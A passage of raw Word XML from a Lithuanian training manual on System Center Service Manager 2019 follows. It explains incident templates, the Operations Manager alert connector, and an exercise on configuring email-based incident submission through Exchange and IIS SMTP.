        <w:t xml:space="preserve"> aprašytos procedūros apibūdina, kaip nustatyti failų priedų reikšmes, įvykio prioritetą ir sprendimo laiką.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1BAFC3" w14:textId="05D6A756" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="52E6E272" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Galite</w:t>
      </w:r>
      <w:r w:rsidR="17EDCE22" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sukurti incidentus</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įspėjimams ir konfigūracijos elementams importuoti iš „Operations Manager“</w:t>
      </w:r>
      <w:r w:rsidR="1EEB27F0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="57312AF7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>audodam</w:t>
      </w:r>
      <w:r w:rsidR="4EA36E69" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Operations Manager“ įspėjimų jungtį, „Service Manager“. Kai peržiūr</w:t>
      </w:r>
      <w:r w:rsidR="5AFEA3FD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ėsi</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>te šiuos įvykius „Service Manager“, galite spustelėti nuorodą, kad gautumėte daugiau informacijos apie įspėjimą arba apie konfigūracijos elemento būseną. „Service Manager“ šiai informacijai pateikti naudoja „Operations Manager“ žiniatinklio konsolės serverį. „Service Manager“ prisijungia prie „Operations Manager“ naudoja URL, kur</w:t>
      </w:r>
      <w:r w:rsidR="022502FA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nurodote „Operations Manager“ žiniatinklio nustatym</w:t>
      </w:r>
      <w:r w:rsidR="5A605A1E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>uose</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1C4783" w14:textId="16EEC825" w:rsidR="00F31708" w:rsidRPr="005A5C28" w:rsidRDefault="00F31708" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA99A66" w14:textId="0BA7F2AA" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="40814FE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sukurkite įvykio šabloną</w:t>
      </w:r>
      <w:r w:rsidR="7FCBEBE8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2951B" w14:textId="2510982B" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="40814FE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Galite naudoti šio </w:t>
      </w:r>
      <w:r w:rsidR="3ACCB2D6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pavyzdžio</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedūras, kad sukurtumėte įvykių šablonus „Service Manager“ </w:t>
      </w:r>
      <w:r w:rsidR="0B7DE00F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>incidentams</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, kuri</w:t>
      </w:r>
      <w:r w:rsidR="5D72C71D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, pavyzdžiui, susij</w:t>
      </w:r>
      <w:r w:rsidR="52903106" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> su el. </w:t>
      </w:r>
      <w:r w:rsidR="4622BFCA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aštu ir spausdintuvais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8EB23" w14:textId="4E331802" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="40814FE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kai pagalbos tarnybos analitikas gauna skambutį, analitikas turi surinkti daug informacijos, kad sukurtų incidentą, pavyzdžiui, problemos santrauką; vartotojo, kuriam bus paskirtas incidentas, vardas ir pavardė; poveikis; skubumas; ir ar tai yra 1, 2 ar 3 lygio</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>incidentas. Kai kurioms įmonės sistemoms ši informacija jau gali būti žinoma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D3F9C" w14:textId="509FF7F0" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="40814FE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Pavyzdžiui, jei kyla problemų el. </w:t>
      </w:r>
      <w:r w:rsidR="3F757604" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ašto sistemoje, incidentas priskiriamas didelio poveikio ir skubos kategorijai, tvarkomas 2 lygio ir priskiriamas konkrečiam analitikui. Galite sukurti įvykio šabloną, kuris pritaikytas naujai įvykio formai užpildo daugelį naujo įvykio laukų. Tai sumažina reikiamą laiką įvykiui sukurti ir užtikrina tikslumą bei nuoseklumą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D740B88" w14:textId="712A0B1D" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="40814FE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įvykių šablonai taip pat naudojami kaip įvykio keitimo darbo eigos dalis. Pavyzdžiui, jūsų įmonė galėjo nustatyti, kad jei su spausdintuvu susijusios problemos aktualumas pasikeis iš „Žemas“ į „</w:t>
      </w:r>
      <w:r w:rsidR="5BECB4E7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Aukštas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“, tas įvykis turėtų būti automatiškai padidintas iki 2 lygio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C695A33" w14:textId="1E85DD9E" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="40814FE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Šiame </w:t>
      </w:r>
      <w:r w:rsidR="36624F52" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pavyzdyje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pateiktomis procedūromis galite sukurti du įvykių šablonus, vieną - su el. </w:t>
      </w:r>
      <w:r w:rsidR="34774D9D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aštu susijusiems įvykiams sukurti, kitą - naudoti su „Incident Change“ darbo eig</w:t>
      </w:r>
      <w:r w:rsidR="0C0D4CC0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>oje sprendžiant</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>spausdintuv</w:t>
      </w:r>
      <w:r w:rsidR="58FD54F3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> problemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C3B53" w14:textId="77777777" w:rsidR="0066332E" w:rsidRPr="005A5C28" w:rsidRDefault="0066332E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B87DDA" w14:textId="77777777" w:rsidR="00713793" w:rsidRPr="005A5C28" w:rsidRDefault="00713793" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>7 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> KONFIGŪRUOTI PRANEŠIMUS INCIDENTŲ VALDYMO SISTEMOJE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8F490" w14:textId="4378D063" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="119671D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="119671D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="119671D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">okinys turi pateikti įdiegtos virtualios mašinos (VirtualBox arba VMware </w:t>
      </w:r>
      <w:r w:rsidR="119671D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">workstation player) ir System Center Service Manager 2019 operacinės sistemos </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ekrano atvaizdus </w:t>
      </w:r>
      <w:r w:rsidR="119671D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidR="4ECC69E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">el. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="4ECC69E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ašto pranešimų </w:t>
      </w:r>
      <w:r w:rsidR="119671D2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>konfigūravimą</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08841E" w14:textId="0BC4A704" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="119671D2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45862210" w14:textId="7BE31D58" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="344D6260" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Konfigūruoti el. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ašto incidentų palaikymą</w:t>
      </w:r>
      <w:r w:rsidR="73A51AF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240E646" w14:textId="0335E024" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="344D6260" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Užuot iškvietę pagalbos tarnybą, jūsų vartotojai gali pateikti incidentus, išsiųsdami el. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">aišką specialiu el. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ašto adresu. Galima naudoti kelis el. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ašto adresus: vieną aparatinei įrangai, vieną programinei įrangai ir spausdintuvams. Pvz., </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ai pranešimas siunčiamas adresu Helpdesk@Helpdesk.Woodgrove.com, „Microsoft Exchange Server“ nukopijuoja pranešimą į „drop map“ kompiuter</w:t>
      </w:r>
      <w:r w:rsidR="5A0C8A29" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, kuriame yra SMTP serverio paslauga. „Service Manager“ stebi šį bendrinimą ir apdoroja pranešimą kaip įvykį. „Service Manager“ analizuoja adresą „From“ ir </w:t>
      </w:r>
      <w:r w:rsidR="448D01DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>suderina</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Service Manager“ duomenų bazės vartotoją. Jei „Service Manager“ negali rasti vartotojo „Service Manager“ duomenų bazėje, pranešimas perkeliamas į </w:t>
      </w:r>
      <w:r w:rsidR="04FC523D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>kitą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> aplanką </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir incidentas</w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nefiksuojamas/nesukuriamas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Administratorius stebi </w:t>
      </w:r>
      <w:r w:rsidR="77535CE3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>kitą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> aplanką</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4295FB" w14:textId="56222F6C" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="344D6260" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Infrastruktūra, reikalinga el. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aštu sugeneruotiems įvykiams valdyti, apima esamą serverį, kuriame veikia „Exchange Server“ arba „SMTP Server“, ir naują serverį, kuriame veikia „Service Manager“ SMTP paslauga. Šiame naujame serveryje naudokite „Internet Information Services \“ (IIS) \ SMTP paslaugas (kurios pateikiamos kartu su „Windows Server“) kompiuteryje, kuriame yra „Service Manager“ valdymo serveris, arba atskirame nuotoliniame serveryje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140AF135" w14:textId="104415DF" w:rsidR="344D6260" w:rsidRPr="005A5C28" w:rsidRDefault="344D6260" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Deleguokite vieną iš esamų serverių, kuriame jūsų įmonėje veikia „Exchange Server“ arba „SMTP Server“, kad visi el. </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ašto pranešimai būtų nukreipti į pagalbos tarnybą, tada sukonfigūruokite IIS SMTP paslaugą</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>su „Service Manager“</w:t>
      </w:r>
      <w:r w:rsidR="4BA3C739" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A78EF78" w14:textId="77777777" w:rsidR="00406A21" w:rsidRPr="005A5C28" w:rsidRDefault="00406A21" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321EB8C3" w14:textId="7E8A212E" w:rsidR="70F3C0C8" w:rsidRPr="005A5C28" w:rsidRDefault="4BA3C739" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>E</w:t>
      </w:r>
